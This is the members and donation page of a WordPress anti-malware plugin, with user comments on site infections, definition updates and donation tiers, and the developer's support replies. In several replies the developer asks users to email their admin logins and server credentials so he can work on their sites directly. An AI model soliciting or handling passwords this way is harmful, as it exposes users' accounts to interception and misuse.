Members

Donations keep this Plugin alive! If you value this Plugin I urge you to donate as much as can so that I can keep it up-to-date and make it better. The more money I get, the more time I can devote to it, the more you benefit.

Thanks for your support!


$14.88 $29.22 $48.81 $76 $152

You must login to manage your profile!

231 Comments on "Members"

  • Hamdi Azis
    On November 21, 2016 at 2:29 am, Hamdi Azis said:

    Donated ;)
    Thanks for this awesome plugin.

    Reply
  • On October 25, 2016 at 10:07 am, Vivienne Edwards said:

    Hi Eli,
    I have donated via PayPal. Sent you email.
    Thanks so much for this plugin.

    Reply
  • Wayne Walters
    On September 9, 2016 at 1:35 pm, Wayne Walters said:

    This plugin has been helpful for me in the past. I just donated. Hoping it’s helpful for me again. Thank you for what you are providing!

    Reply
  • Andy
    On August 14, 2016 at 3:38 am, Jazmin Ponce said:

    Perfect! Gracias!

    Reply
    • Andy
      On August 14, 2016 at 6:19 am, Jazmin Ponce said:

      Hello!
      Excuse my English I speak Spanish!

      Really very good, I congratulate you.
      How many sites can activate with a donation of 29 dollars?

      Best regards

      Reply
  • Ama Davies
    On August 10, 2016 at 12:11 am, Ama Davies said:

    Happy to donate. Keep up the great work!

    Reply
  • Rogier ROAX
    On July 27, 2016 at 8:19 pm, Rogier ROAX said:

    Donated :)

    Reply
  • S A
    On July 25, 2016 at 3:26 pm, S A said:

    Donated via paypal email because paypal wouldn’t let it got through the normal way,
    Thanks for developing this pluggin

    Reply
  • Craig Binnie
    On May 30, 2016 at 1:48 am, Craig Binnie said:

    I may be premature in asking this because the scan is still going, but Google has provided a list of the infected pages on our website. Your amazing, brilliant scanner has picked up numerous problems and fixed them but none of them are on the pages that Google says are the problem pages.

    I’m scared that we are going to miss the pages that Google says are the problem pages.

    Reply
    • Anti-Malware Admin
      On May 30, 2016 at 8:29 am, Anti-Malware Admin said:

      Google will only tell you about Pages (URLs) that are showing malicious content. My plugin will find the files (PHP code) that is responsible for that content being displayed. Once the files are clean then you can request a review in your Google Webmaster Tools account and Google will rescan those URLs to make sure they are clean and then remove your site from their blacklist.

      Reply
      • Craig Binnie
        On May 30, 2016 at 1:17 pm, Craig Binnie said:

        OMG. Your scanner worked. We are back on Google. I paid someone $50 to help me clean our sites and he didn’t get any result. And I paid someone else and he didn’t get a result. But your scan did it. It found the infected files and cleaned them with one click. It took 4 hours to scan only about 100 pages but it was worth it. You are a champion.

        Reply
  • Laurent AUSSET-DELON
    On May 25, 2016 at 12:46 am, Laurent AUSSET-DELON said:

    Hi
    I just get registered and made donation but, i still see no key in the plugin setting page and “Download new definitions” has no effect (“Download the new definitions (Right sidebar) to activate this feature” still in red)
    Any help ?

    Reply
    • Anti-Malware Admin
      On May 26, 2016 at 7:23 am, Anti-Malware Admin said:

      I see your donation for $14.89, Thanks for that ;-)

      If the Manual Updates are not working then you should check your firewall settings.

      If you are referring to the Automatic-Update feature then you need to have donated above the default level (at least $29+).

      Reply
  • gord rufh
    On May 21, 2016 at 12:16 pm, gord rufh said:

    How do I get all my sites working.

    Thanks

    Reply
  • daniel miranda
    On May 12, 2016 at 3:50 pm, daniel miranda said:

    Can I install de same plugin in other web site?

    Reply
    • Anti-Malware Admin
      On May 12, 2016 at 4:14 pm, Anti-Malware Admin said:

      Yes, you can use this plugin on as many site as you want.

      Just get a new key for each site and register them all using the same email and they will all be under the same account.

      Reply
      • daniel miranda
        On May 12, 2016 at 5:25 pm, daniel miranda said:

        how I can register a new site ?

        Reply
        • Anti-Malware Admin
          On May 12, 2016 at 10:47 pm, Anti-Malware Admin said:

          The same way your registered your first site. Install and Activate the plugin, then go to the Anti-Malware Settings page in your wp-admin, click on “Get FREE Key”, and submit the registration form. Just remember to use the same email address that you used to register your first site if you wan them to be in the same account.

          Reply
  • 34SAD ZNS
    On May 10, 2016 at 7:39 pm, 34SAD ZNS said:

    Just wanted to say that your plugin saved me from the hearth attack. Thank you so much, just donated $29.

    Reply
  • Panduranga Reddy
    On May 3, 2016 at 4:45 am, Panduranga Reddy said:

    Greetings!

    have you developed anti malware for Joomla!

    Pandu

    Reply
    • Anti-Malware Admin
      On May 4, 2016 at 12:21 am, Anti-Malware Admin said:

      No, sorry, This plugin is currently only available for WordPress. You can however put any files that you want to scan into a directory on your WordPress site and the plugin can then scan them for you ;-)

      Reply
  • Rick Beethe
    On April 14, 2016 at 7:43 pm, Rick Beethe said:

    Wow, I was overwhelmed and I happened on your plugin. I had found some but I don’t know php and some of the php code seemed odd to me. Sure enough, you flagged it!! Stats from my site:
    5202 Scanned Files
    1074 Scanned Folders
    Found 4 Backdoor Scripts
    Found 22 Known Threats

    Now just to get my site off the blacklist. Ugh.

    Reply
  • Prem Singh
    On April 7, 2016 at 6:57 am, Prem Singh said:

    Hi great plugin just donated a small amount of $10, how do I make all features available for my site? Thank you…

    Reply
    • Anti-Malware Admin
      On April 7, 2016 at 2:08 pm, Anti-Malware Admin said:

      Thanks for your donation :-)

      Donating a total of $14+ will unlock the Brute-Force Protection in the Firewall Settings.

      A total contribution of $29+ would unlock all features, including the Automatic Updates which makes the Core Files Definitions available too.

      Reply
  • Mudasir Nazar
    On April 4, 2016 at 8:38 pm, Mudasir Nazar said:

    Hello,

    I can’t download the updates after generating a key when i click on download it will redirect me on scan page which does not show the key and ask me to generate a key again.

    Please help me what should I do ?

    also please tell me is there any other source to donate this plugin ? because we dont have PayPal service here in our country.

    Thanks

    Reply
    • Anti-Malware Admin
      On April 5, 2016 at 9:38 am, Anti-Malware Admin said:

      The two most likely reasons for the definition updates not being installed are either: you have a post size limit specified in your php.ini file that is too small for the initial updates; or you might have another firewall plugin installed that is blocking the updates.

      I’m sure that the Automatic Update method would work for you but I am sorry that I don’t have any other means of accepting donation besides PayPal.

      If you would like me to troubleshoot the definition updates on your site you could send me your wp-admin login, directly to my email address, eli AT gotmls DOT net

      Reply
  • Grégoire Sierra
    On March 29, 2016 at 10:21 pm, Grégoire Sierra said:

    Hey, good morning,
    Awesome plugin ;)
    One question can I get a receipt for the donation ?
    Thaks for your time

    Reply
    • Anti-Malware Admin
      On March 30, 2016 at 8:04 am, Anti-Malware Admin said:

      Thanks for your donation, I don’t send invoices or receipts but I think you can print the transaction details from PayPal as a receipt ;-)

      Reply
  • Rob
    On March 29, 2016 at 9:41 pm, Rob said:

    A scan I just did of my site showed that it was clear of malware, however, when I visit it… my antivirus warns me that the site is infected. I confirmed this on another computer. Why is this? I thought your program would catch it.

    Reply
    • Anti-Malware Admin
      On March 30, 2016 at 8:11 am, Anti-Malware Admin said:

      I don’t know what type of warning you got from your Anti-Virus software but your site looks clean now. The warning you got was probably related to a blacklist which can sometimes take a little longer to clear up even after you have cleaned your site.

      Reply
  • TJ Chambers
    On February 26, 2016 at 2:51 pm, TJ Chambers said:

    I added some html pages to the white list but they keep coming up in the threat. I would like to know if there is something that is a threat or if it is a false positive.

    Also, my definitions are set to auto update but they don’t. I had to update them.

    Reply
    • Anti-Malware Admin
      On February 28, 2016 at 11:52 am, Anti-Malware Admin said:

      Have the definitions set to auto update is the reason that your custom white-list get’s overwritten. The auto update feature installs the most current definition every time a scan is initiated, so you won’t see them getting installed until you start a scan because they are not needed until then.

      As for those HTML file that you are trying to white-list, can you send them to me so that I can see if they are false positives?

      Reply
    • TJ Chambers
      On May 21, 2016 at 1:27 pm, TJ Chambers said:

      I have optimizedpress on my hosting account with WP. A bunch of pages for OP show they are a known threat because there is js after the body. It seems that this script should be there changing some fonts on the page. I was wondering if you can verify its a false positive.

      Reply
      • Anti-Malware Admin
        On May 21, 2016 at 2:00 pm, Anti-Malware Admin said:

        That theme does but the script tags after the closing of the body tag :-( which should be reserved for hackers and bad programmers ;-)

        Just edit those files that are same and move the scripts inside the body tag, where they should be, and then it will not look like hackers injected that code ;-)

        Reply
  • Shawn Swinigan
    On February 14, 2016 at 1:10 pm, Shawn Swinigan said:

    Eli: I donated and registered a site but then put the second site under a different email before realizing it. Can you help me move the site under my donated account?

    Thanks

    ss

    Reply
    • Anti-Malware Admin
      On February 14, 2016 at 2:01 pm, Anti-Malware Admin said:

      You can just login to gotmls.net with the password that was sent to that second email address and then transfer that registration to your first email ;-)

      Reply
  • Azu Mendoza
    On February 14, 2016 at 9:15 am, Azu Mendoza said:

    Hi, I meant to donate the $29 to to BETA test the new Scan Core File feature and get Automatic Definition Updates.
    I donated $14 by mistake :(
    Can I pay donate the difference? I want to try it out and if ths works I will donate for each installation I make on each wordpress site I have.

    Thank you so much

    Azu

    Reply
  • Reggie Blair
    On February 10, 2016 at 7:13 am, Reggie Blair said:

    Hello! Plugin is fantastic and I’ve donated for sure. Issue is the “Automatically Fix Selected Files Now” isn’t working for me. Then I tried to press the designated button for it it was taking too long and I keep getting this error:

    Not Acceptable!
    An appropriate representation of the requested resource could not be found on this server. This error was generated by Mod_Security.

    Can I get some help on this please? If I can get these errors fixed, it would be amazing. Thanks!

    Reply
    • Anti-Malware Admin
      On February 10, 2016 at 10:51 am, Anti-Malware Admin said:

      It sounds to me like your Mod_Security settings are blocking my plugin from fixing those files. You need to talk to your hosting provider about changing the settings for Mod_Security to allow these requests or else whitelist your IP address to that you can at least fix those files.

      Reply
  • Jonson Bhowmik
    On February 4, 2016 at 1:22 pm, Jonson Bhowmik said:

    I am using your plugin from the beginning of my blog. Recently Google has warned me about malicious content on my website. But after scanning the site it’s not showing or detecting anything new. But Google has not removed the warning. Can you please suggest me what to do?

    Reply
    • Anti-Malware Admin
      On February 4, 2016 at 1:34 pm, Anti-Malware Admin said:

      Sometimes Google take a long time to update their cached results for a site and this delays the removal of that warning you are getting. Re-check the date on the last threat that is shown in the Security section of your Google Webmaster Tools. If it is today’s date then you may have a new threat on your site, have you downloaded the latest definition updates for my plugin?

      Reply
  • Prodos Marinakis
    On February 4, 2016 at 4:01 am, Prodos Marinakis said:

    Greetings.

    I’m having an odd problem at one of the sites where I’ve installed your fabulous plugin.

    I log in to the site click the “Anti-Malware” button.

    It says on that page “Get FREE Key!”

    I click on that and it immediately displays the key and also displays “Download new definitions!”

    i.e. It doesn’t present me with the usual form to fill in with name and email address.

    So I click the “Download new definitions!” button and nothing happens.

    Something seems to be TRYING to happen, but it never does. Eventually, the page times out.

    Unlike the other sites that I’ve registered with a KEY, this site always asks me to get a Key.

    Your advice on this would be appreciated. Thanks.

    Best Wishes,

    PRODOS
    Melbourne, Australia

    Reply
    • Anti-Malware Admin
      On February 4, 2016 at 6:29 am, Anti-Malware Admin said:

      It sounds like that site was already registered. The same Key will be regenerated for that site every time you Get the Key, but it cannot be saved unless the definitions are downloaded. The problem is that you don’t seem to be able to download the definitions on that site. I’m not sure why it’s not downloading on that site, and this suggestion is kind of a lame workaround, but have you tried the Automatic Updates? When the manual download and save fails for whatever reason the Automatic method always works. Just click “Get FREE Key” as usual but then check the “Automatically Update Definitions” box at the bottom of the Scan Setting page and then click Save.

      Reply
  • Kai Kai
    On December 14, 2015 at 1:53 am, Kai Kai said:

    Hey, i have donated but i can’t scan the Core File Changes – but why?

    Reply
    • Anti-Malware Admin
      On December 14, 2015 at 6:40 am, Anti-Malware Admin said:

      Thanks for your donation. You just need to check the box for Automatic Updates at the bottom of the AntiMalware -> Scan Setting page in your wp-admin and then click Save. Then you will have the definitions for the Core Files.

      Reply
  • james cortel
    On November 12, 2015 at 4:26 pm, james cortel said:

    thank you so much!! you are a virtual hero :)

    Reply
  • Cedric B
    On November 9, 2015 at 6:46 am, Cedric B said:

    i need help. My host (hostgator) have restricted all my sites, and now i cannot even access to my WP admin, so i cannot make your plugin run …. (is there a way you can help me via ftp access only ?) – thanks

    Reply
    • Anti-Malware Admin
      On November 11, 2015 at 10:51 am, Anti-Malware Admin said:

      It’s hard to work on this kind of thing when you cannot access your sites. How many sites do you have on that account?

      Maybe they can restore access to one site for you so that you can use my plugin to clean them all up.

      Reply
      • Cedric B
        On November 12, 2015 at 3:47 pm, Cedric B said:

        well.. i’ve managed to migrate the sites one by one to other servers, so i can have access again to WP panel, and use your plugin to clean them up..
        Thanks for your help, and by the way, i just paid the 29$ via paypal today for your plugin which sound to work really good !.. Thanks a lot again for your work !..

        PS : Hostgator is just a big Axx Hxxx and don’t help you at all when you are in trouble with malwares or attacks. They just close your site and that’s it. And then they try to sell you their security services, … for very expensive ..! Good business for them !.. So I decided to move all my sites to other servers … Bye bye, i am not going into this fake business ..

        Reply
  • Tim Spaulding
    On October 26, 2015 at 4:11 pm, Tim Spaulding said:

    Thanks for this tool, it has identified several issues. However, when I run the quick scan on themes it skips all of the subfolders. I don’t see any settings where I can update the quick scan. Is there a way to update this?

    Reply
    • Anti-Malware Admin
      On October 26, 2015 at 8:50 pm, Anti-Malware Admin said:

      The Quick Scan was designed to be a fast and short scan of the most likely locations for Known Threats. It runs under a single PHP process so that it finishes quickly but that means it has memory and timeout issues so I defaulted the scan_depth to 2 so that it would not drill down too deep and get stuck half way through a scan. You can manually override the scan_depth by adding the URL parameter at the end of the Quick Scan path (try adding &scan_depth=3 to the end of the URL, if that work then maybe try 4 or 5).

      Reply
  • leong yih saw
    On June 22, 2015 at 1:56 pm, leong yih saw said:

    my url got malware/virus , if open desktop web i didnt see any different but when i open my url via mobile phone, the url keep direct me to adsvertisement web, i already use your plugin to scan but didnt detect any malware/virus ? any step i miss ?

    Reply
  • Kahaduwage Chathura Buddhika
    On May 8, 2015 at 5:04 pm, Kahaduwage Chathura Buddhika said:

    Hi,

    After most recent update I no longer can download new definition updates. It says, “Your Installation Key is not yet Registered!”. But as I found out in my profile in Gotmls it is registered and active.

    Can you please look into this issue?

    Thanks and have a great day!

    Reply
    • Anti-Malware Admin
      On May 8, 2015 at 5:45 pm, Anti-Malware Admin said:

      Thanks for the login. This is a multisite and I don’t have network admin access so I cannot fix it for you but I did figure out what the problem is and I just released another update that should fix this for you.

      Please download version 4.15.19 and let me know if that does he trick.

      Reply
      • Rosemary Carey
        On May 8, 2015 at 6:12 pm, Rosemary Carey said:

        I am having the same problem. It says my key is registered on here, but the plug keeps the message not registered. I am not using multi site and i am already updated to 4.15.19

        Reply
        • Anti-Malware Admin
          On May 8, 2015 at 6:20 pm, Anti-Malware Admin said:

          Sorry for the confusion, 4.15.19 didn’t fix it so I release 4.15.20 which has been confirmed to fix this issue. Please recheck for plugin updates and download 4.15.20 to resolve this issue.

          Reply
  • SamR
    On May 6, 2015 at 6:40 pm, Sam Rod said:

    Eli,
    What about multiple sites. not to complain because Im happy as a pea. but I have several personal websites. Can I use the same key? or do I must I donate for each of them? just asking. BTW great plugin. World needs more people like you!
    TIA.
    Sam

    Reply
    • Anti-Malware Admin
      On May 6, 2015 at 8:10 pm, Anti-Malware Admin said:

      Thank you!

      Each site generates it’s own key, but you can register each site key under the same email address so that they are all on the same account. Then you can make one lump-sum donation for all sites on that account.

      Reply
      • Lynn Strauch
        On May 29, 2015 at 8:55 am, Lynn Strauch said:

        I don’t see where I can add this to my other 2 sites. I have a few plugins that I did pay for and there is always a license key on top that I just paste my code to, and it activates it on the site. I don’t see anything like this for the other two sites I have no idea how to do it. Can you instruct me please?

        Thanks,

        Lynn

        Reply
        • Anti-Malware Admin
          On May 29, 2015 at 8:58 am, Anti-Malware Admin said:

          Each site must be registered with it’s own unique Installation Key, but if you use the same email when registering multiple sites then they will all be registered under the same account.

          Reply
  • Norm Attarmigiroglu
    On April 27, 2015 at 6:25 am, Norm Attarmigiroglu said:

    Thank you for a great plugin. The depth of your technical expertise puts me and my clients at ease. Great work. Please keep it up.

    Reply
  • Ratnakar N
    On January 29, 2015 at 6:16 am, Ratnakar N said:

    Excellent software..I really thank ELi and the people who made this great work..
    a great sigh of relief!

    Reply
  • Luis Mendez Alejo
    On December 7, 2014 at 4:13 pm, Luis Mendez Alejo said:

    Hi Eli,

    My 2 cents collaboration, Spanish howto:
    http://www.webempresa.com/blog/item/1641-detectando-y-limpiando-malware-en-wordpress.html

    Thx & regards

    Reply
  • Jeff
    On October 15, 2014 at 1:09 pm, Jeff said:

    Eli, thanks for a great service. Another donation on the way

    Reply
  • Rune Jensen
    On October 2, 2014 at 12:45 am, Rune Jensen said:

    The fix isn´t working.
    The scan finds 306 knwon threats, but when I press “Automatically fix selected files now” it thinks for 3 seconds and says “Nothing selected to be changed” and “Done!” and nothing happens

    Reply
    • Anti-Malware Admin
      On October 2, 2014 at 6:43 am, Anti-Malware Admin said:

      Are you certain these are “Known Threat”, in red, and these are check-boxes at the beginning of each line that are all checked?

      If you are still having this issue can you send me a screen-shot?

      Reply
    • Anti-Malware Admin
      On October 2, 2014 at 12:00 pm, Anti-Malware Admin said:

      Thank you for sending me a login to your site. Something on your site is blocking my plugin from submitting the “Fix” form. I upgraded my plugin on your site to the BETA version that I am about to release. The new version of my plugin includes a workaround for this scenario and you should be able to fix the malware it finds now.

      Please run another Complete Scan and let me know how it goes.

      Reply
  • Mike Harvey
    On September 12, 2014 at 6:17 pm, Mike Harvey said:

    Hi Eli,

    I’m a little confused about the Scan level setting.

    If it is set to -1 does that scan all of the folders on a particular domain folder or does it scan all the folders of all the domains in my account on a shared server?

    If not, how is it possible to do a complete server scan of all sites at one time?

    Does the plugin need to be installed on each individual domain and run separately?

    Also are folders outside of public_html scannable or vulnerable to attack?

    Seems like a great plugin, would like to make the most of it,

    Thanks

    Reply
    • Anti-Malware Admin
      On September 12, 2014 at 10:03 pm, Anti-Malware Admin said:

      The Scan Depth is how far down to drill into directories looking for threats, not how far up to start looking.

      I have set The Scan Level for your domain to start scanning one level higher, this should get you into the public_html directory where you can scan all your sites at once, but you need to Download the latest Definition Update for this change to take effect.

      It is possible for hackers to take control of a server at the root level (outside you home directory) but there is not much you can do about that unless it’s your server.

      Let me know if I can be of any further assistance.

      Reply
  • Maymay Helms
    On December 13, 2013 at 12:55 pm, Maymay Helms said:

    Help, I have used the program, registered the key and made a donation. The scan will only complete to 66% and it seems to have really, really slowed down my site. I do not know where to begin to correct this.

    I really appreciate your plug in and need support. Thanks Maymay

    Reply
    • Anti-Malware Admin
      On December 13, 2013 at 1:06 pm, Anti-Malware Admin said:

      Have you tried the Complete Scan? it does not task your sites resources as much as the Quick Scan.

      When it stops at 66% is there an error message?

      If you want to give the your WP Admin login I can try it myself and see what’s going on.

      Reply
  • Stacy Taylor
    On November 13, 2013 at 10:24 am, Stacy Taylor said:

    Is there a way to schedule scans? Maybe an upgrade or cron job I could run? I’ve got too many sites to have time to go in and run this constantly.

    Reply
    • Anti-Malware Admin
      On November 13, 2013 at 10:37 am, Anti-Malware Admin said:

      There is no way to schedule a Complete Scan at this time but that is a feature that I am working on. However it would be a pretty poor band-aid to just keep scanning and cleaning your sites over and over when what you really need is to get them all completely clean and patch the hole that is letting these hackers reinfect you.

      Two things that might help you right now are: (1) I could get my plugin to scan all of your sites at once from just one admin page if all your sites are on the same server, (2) If you find out how the hacker is planting scripts on your server then you can stop him (or her) from continually re-infecting you.

      Reply
  • Austin Delaney
    On November 2, 2013 at 8:41 am, Austin Delaney said:

    Hey Eli;

    Just loaded up your plugin and ran a scan – I’ve got 21 potential threats – mostly well-known plugins and wp-includes js files.

    Shall I send them to you via the plugin to check?

    Thanks!
    Austin.

    Reply
    • Anti-Malware Admin
      On November 2, 2013 at 9:12 am, Anti-Malware Admin said:

      There are a lot of .js files that come up as Potential Threat just because the use the eval() function. These are usually ok but I leave that general rule in there in case you have a threat on your site that you cannot find in the Known Threats. If you are sure that these are all ok then you can whitelist them in my plugin and send me your reason in the form provided then I will get to adding them to my global whitelist when I have time. Honestly, I am very busy right now and whitelisting potential threats in .js files is about the lowest thing on my list of priority list. This being a free plugin, financed only by your donations, I do what I can to make it the best it can be, focusing on new threats first and then important features and enhancements.

      Reply
  • Isaac Oyelowo
    On November 1, 2013 at 5:43 pm, Isaac Oyelowo said:

    I have barely used this plugin for 8minutes and I’m like wtf is this. This is the best plugin I have ever come across on wordpress and you really deserve lots of kudos for this. Do you do freelance work?

    Reply
    • Anti-Malware Admin
      On November 1, 2013 at 6:12 pm, Anti-Malware Admin said:

      Thanks for the kudos. I do freelance but I’m very busy at the moment. Feel free to email me directly if you need anything and I see what I can do.

      Reply
  • Abayomi Alex Adegoke
    On October 30, 2013 at 5:13 am, Abayomi Alex Adegoke said:

    Hi Eli. I have just stumbled on your plugin. Google blacklisted my blog couple of days ago and the problem listed was a code injection that was linked to a website called earnmoneydo or something like that

    I have tried to look for this code but couldn’t find it. I have run your plugin and I have deleted 4 known threat. Does that mean its a safe now even though the code wasnt included in the one your plugin found?

    Kind regards for your help.

    Reply
    • Anti-Malware Admin
      On October 30, 2013 at 9:26 am, Anti-Malware Admin said:

      If you removed the Known Threats that my plugin found then it probably fix. Now you need the Google to refresh the cache they have of your site so that they drop that warning. The best way to do that is to request a review in the Malware section of your Google Webmaster Tools account.

      Reply
  • Kevin Sommerfield
    On October 17, 2013 at 5:47 am, Kevin Sommerfield said:

    I noticed last week that when I looked up my website on google I get a warning message that says “this site might be hacked.” I ran a site scan and got this:

    Known Spam detected.
    Details: http://sucuri.net/malware/entry/MW:SPAM:SEO
    <a href=”http://norwestenergy.com.au/?mwu=261-buy-viagra-online-melbourne” rel=”nofollow”>Buy
    Viagra Online Melbourne</a>

    I ran your antimalware plug-in on my site and it didn’t come back with anything. ::(

    Reply
    • Anti-Malware Admin
      On October 17, 2013 at 6:09 am, Anti-Malware Admin said:

      MW:SPAM:SEO is a generic label for a broad range of malicious ads. Although my plugin can find and automatically fix many of then there are always new variants that come out that need to be added to my definition update. If you can provide me with WP Admin access to your site then I will find this new threat and add it to my definitions so that it can be automatically removed like the rest.

      Reply
      • Kevin Sommerfield
        On October 17, 2013 at 6:13 am, Kevin Sommerfield said:

        Thank you so very much. Is there an email where I can send the log in info to?

        Reply
        • Anti-Malware Admin
          On October 17, 2013 at 8:10 am, Anti-Malware Admin said:

          I got the login you sent me, thanks.

          The problem was just that you had not downloaded my latest definitions update. Once I did that and ran a Complete Scan it started finding a Back-door redirect script embedded in hundreds of WordPress core files. The Complete Scan took about 25 minutes to scan over 20,000 files on your site and found a total of 820 malicious scripts. I had it automatically remove these injection from the infected files and your site does not appear to be infected any more.

          It looks like it may have been a vulnerability in your “irresistible” theme that let this hacker into your site. You should delete that theme if you are not using it.

          Reply
  • Arthur Dale Baker
    On October 14, 2013 at 1:36 pm, Arthur Dale Baker said:

    Found this plugin today and used it to clean a site on a GoDaddy server and it found a LOT of stuff that the GD tech missed. Thanks so much for this great tool. Just donated, too and will donate each time I load this on any WP installation.

    Have a couple of questions — In the htaccess file it flagged this part

    RewriteRule ^.*$ http://

    of this line:

    [code]
    RewriteRule ^.*$ http://www.article6blog.com/rss.php? [R,L]
    [/code]

    What should that be?

    Thanks, Dale

    Reply
    • Anti-Malware Admin
      On October 14, 2013 at 1:57 pm, Anti-Malware Admin said:

      Thanks for the donation.

      My plugin only flagged that RewriteRule in your .htaccess file as a Potential Threat because it was redirecting to an absolute path. This type of redirection is non-standard in WordPress and often times used to conditionally redirect selected visitors or bots to malicious content away from your site. In this case we can tell that it is only your site being specified and so you can ignore this Potential Threat warning. You can always user relative paths when directing visitors to other pages on your site if you want to, that way it will not look so suspicious to my scanner.

      Reply
  • Baby Games
    On October 14, 2013 at 12:56 pm, Baby Games said:

    Hello. My site has Virus http://babygamesonly.com/

    How i can remove it ?

    Reply
    • Anti-Malware Admin
      On October 14, 2013 at 1:22 pm, Anti-Malware Admin said:

      I take it you have scanned it with my Anti-Malware plugin and found no Known Threats? If my plugin does not find anything you can send me your WP Admin login and I’ll look for it myself.

      Reply
  • Greg Roth
    On September 23, 2013 at 4:21 pm, Greg Roth said:

    I installed your great plugin previously and it was working great. I updated WordPress and now your plug in is not showing up on my dashboard. Also, I tried installing and it says that it the plugin already exists but I am not finding it. Can you please assist?

    Reply
    • Anti-Malware Admin
      On September 23, 2013 at 5:02 pm, Anti-Malware Admin said:

      Does it show on the list of installed plugins? Is it the newest version? When you tried installing it and got the “already exists” error, what was the exact message you got?

      If you want me to look at it for you please send me your WP Admin login.

      Reply
  • O H
    On September 9, 2013 at 1:14 pm, O H said:

    I just installed your plug in but it didn’t find any known threats but I do have a real compromised problem here. When I type in my website http://www.octaviaharris.com on sites like facebook or https://bitly.com/ the description and page text display weird text like this:

    Isr med assoc j androl mccullough levine return of Levitra Viagra Vs Levitra Viagra Vs symptomatology from a nexus between the serum. Criteria service connection on erectile dysfunctionmen who have Price Of Cialis Price Of Cialis revolutionized the users of ejaculation? They remain the chronicity of diverse medical Cialis Cialis and minor pill communications.

    It just started happening yesterday. Can your plug in help resolve my issue?

    Thanks

    Reply
    • Anti-Malware Admin
      On September 9, 2013 at 1:43 pm, Anti-Malware Admin said:

      It should be able to find this threat. If you have downloaded the latest definition update and it still does not find any known threats on a Complete Scan then you can send me your WP Admin login and I will find it for you and add it to my definition update so that it can be automatically detected and removed.

      Reply
  • John Vargas
    On August 26, 2013 at 5:50 am, John Vargas said:

    Hello,

    My WP site was compromised. I went ahead removed php files via FTP that the plugin found. Would you please check things out to be make sure sure that all is well now.

    Thanking you in advance!

    Reply
    • Anti-Malware Admin
      On August 26, 2013 at 9:01 am, Anti-Malware Admin said:

      It looks alright from the outside. What was the file that you deleted?

      If you have any reason to think you might still be infected and you want me to check it out from the inside I’ll need your WP Admin login.

      Reply
  • Michigan Lupus
    On August 21, 2013 at 8:27 am, Michigan Lupus said:

    Hello,

    I am having recurring issues with backdoor scripts? Can you please help me resolve this issue?

    Reply
    • Anti-Malware Admin
      On August 21, 2013 at 8:40 am, Anti-Malware Admin said:

      Send me your WP Admin login and I’ll take a look. You can email the info directly to me: eli AT gotmls DOT net

      Reply
  • Numair Imran
    On August 18, 2013 at 1:56 am, Numair Imran said:

    Thanks for this AMAZING plugin
    I have tried everything to reface my website
    crescentcarco.com
    replaced every file, except the uploads folder *checked it manually*
    now my subpages work fine but my main page still redirects.
    can you PLEASE take a look at it, I will be obliged

    Reply
    • Anti-Malware Admin
      On August 18, 2013 at 7:57 pm, Anti-Malware Admin said:

      Thanks for sending me access credentials to your site and your server.

      Got the home page fixed!

      It turns out there was a text widget that was injected into your database. I’m not sure how the hacker did that, probably a database vulnerability at the hosting level, but it was easy to remove.

      Please let me know if there is anything else I can do for you.

      Reply
      • Numair Imran
        On August 18, 2013 at 8:03 pm, Numair Imran said:

        Dude you seriously ROCK

        i also saw the entry of the text widget in the database, it looked suspicious and made no sense at all, but i was afraid to mess up the DB.

        Once again thanks man, I really appreciate your help

        Any advise on securing my site permanently, it gets defaced often.

        Thanks
        Numair

        Reply
        • Anti-Malware Admin
          On August 19, 2013 at 7:39 am, Anti-Malware Admin said:

          Thanks.

          Protecting your site from future hacks is difficult because there are just so many ways that hacker will try to get in. In your case, because of the way the DB was hacked I would suggest moving to a more secure hosting environment. Cheap shared hosting is just so vulnerable to cross-site contamination, control panel breaches, and root server hacks.

          I now offer very secure hosting for those that are getting too much attention from hackers and need a safer place to host their site. It’s $12/month per site and there is no control panel. Let me know if you are interested.

          Reply
  • Nma
    On August 7, 2013 at 7:00 am, Nma said:

    Eli,

    Thank you for the wonderful work you’re doing and for this great plugin.

    Three of my WP sites were hacked last week and the hacker’s page and music (from Philipines) were inserted on my homepage. After a couple of days, Hostgator fixed it for me and warn me to always updates my plugins and themes.

    Today, the same hacker did his thing again, only it has affected more of my sites.

    Thus, I downloaded your plugin and after scanning one site, it identified 4 potential viruses. Below is one of them.

    Do you think this is the virus. I can give you admin access if that will help.

    Thanks!

    cap->create_posts ) )
    wp_die( __( ‘Cheatin’ uh?’ ) );

    /**
    * Press It form handler.

    Reply
    • Anti-Malware Admin
      On August 7, 2013 at 10:08 am, Anti-Malware Admin said:

      Thanks for sending me your WP Admin login credential. I downloaded my definition updates and ran a Complete Scan on your site. Those potential threats are all ok. It looks like your site was defaced by a hacker using a vulnerability of your server or another compromised site on your shared host. There may be nothing you can do to stop an attack like this other than moving all your sites of that server.

      The good news is that the damage is minimal and very easy to fix. The hacker has planted a file called index.html in the root directory of each infected site. WordPress uses a file called index.php so index.html is not needed and should be deleted. You can use your host’s file manager or any FTP client to delete these infected index.html files easily. I have also updated the scan range of my plugin on your server to scan the whole public_html directory and all the sites in it. If all else fails you can use me plugin to find and delete these infected files, it will take a really long time to run a Complete Scan on all those site but the option is now there if you need it.

      Let me know if you need any more help.

      Aloha, Eli

      Reply
  • Limp Salas
    On July 17, 2013 at 11:48 pm, Limp Salas said:

    I’ve got some malicious virus on the website and ran your plugin which found 18 potential threats. A lot of index.php in different folders that just have one single script in each file (?). But i really dont know how to do now. How do I get rid of this malicious virus? Can you please go into the website and fix this? Would of course make a donation if the virus gets away.
    Thanks,
    Limp

    Reply
    • Anti-Malware Admin
      On July 18, 2013 at 8:34 am, Anti-Malware Admin said:

      Can you please email me with the WP Admin login for your site?

      My direct email is: eli at gotmls dot net

      Reply
    • Hay Wilson
      On March 11, 2014 at 1:59 pm, Hay Wilson said:

      hi i have the same issue please help

      Reply
      • Anti-Malware Admin
        On March 11, 2014 at 10:44 pm, Anti-Malware Admin said:

        Have you registered my plugin and downloaded the latest definition updates?

        If you have done this and my plugin still does not find any known threats then this could be a new type of infection that needs to be added to my definition update. As I told Limp Salas, if you send me your WP Admin login I will find it for you and add it to my definitions so that it can be automatically removed.

        Reply
  • Nikhil Mahajan
    On July 5, 2013 at 6:42 pm, Nikhil Mahajan said:

    Hi

    First of i must say awesome plugin but thing is that i am facing daily wordpress post attack like
    and something suspecious

    these kind of attack .

    Do you have any plugin that solves these kind of issue on posts ??

    Thanks

    Reply
    • Anti-Malware Admin
      On July 5, 2013 at 8:13 pm, Anti-Malware Admin said:

      It sounds like this could be an SQL injection. You should try changing the login credentials to your DB. If the attacks continue at regular intervals check the log files at the time of the attack to see if you can spot the script file responsible for the injection.

      Reply
  • WAYNE STOCKS
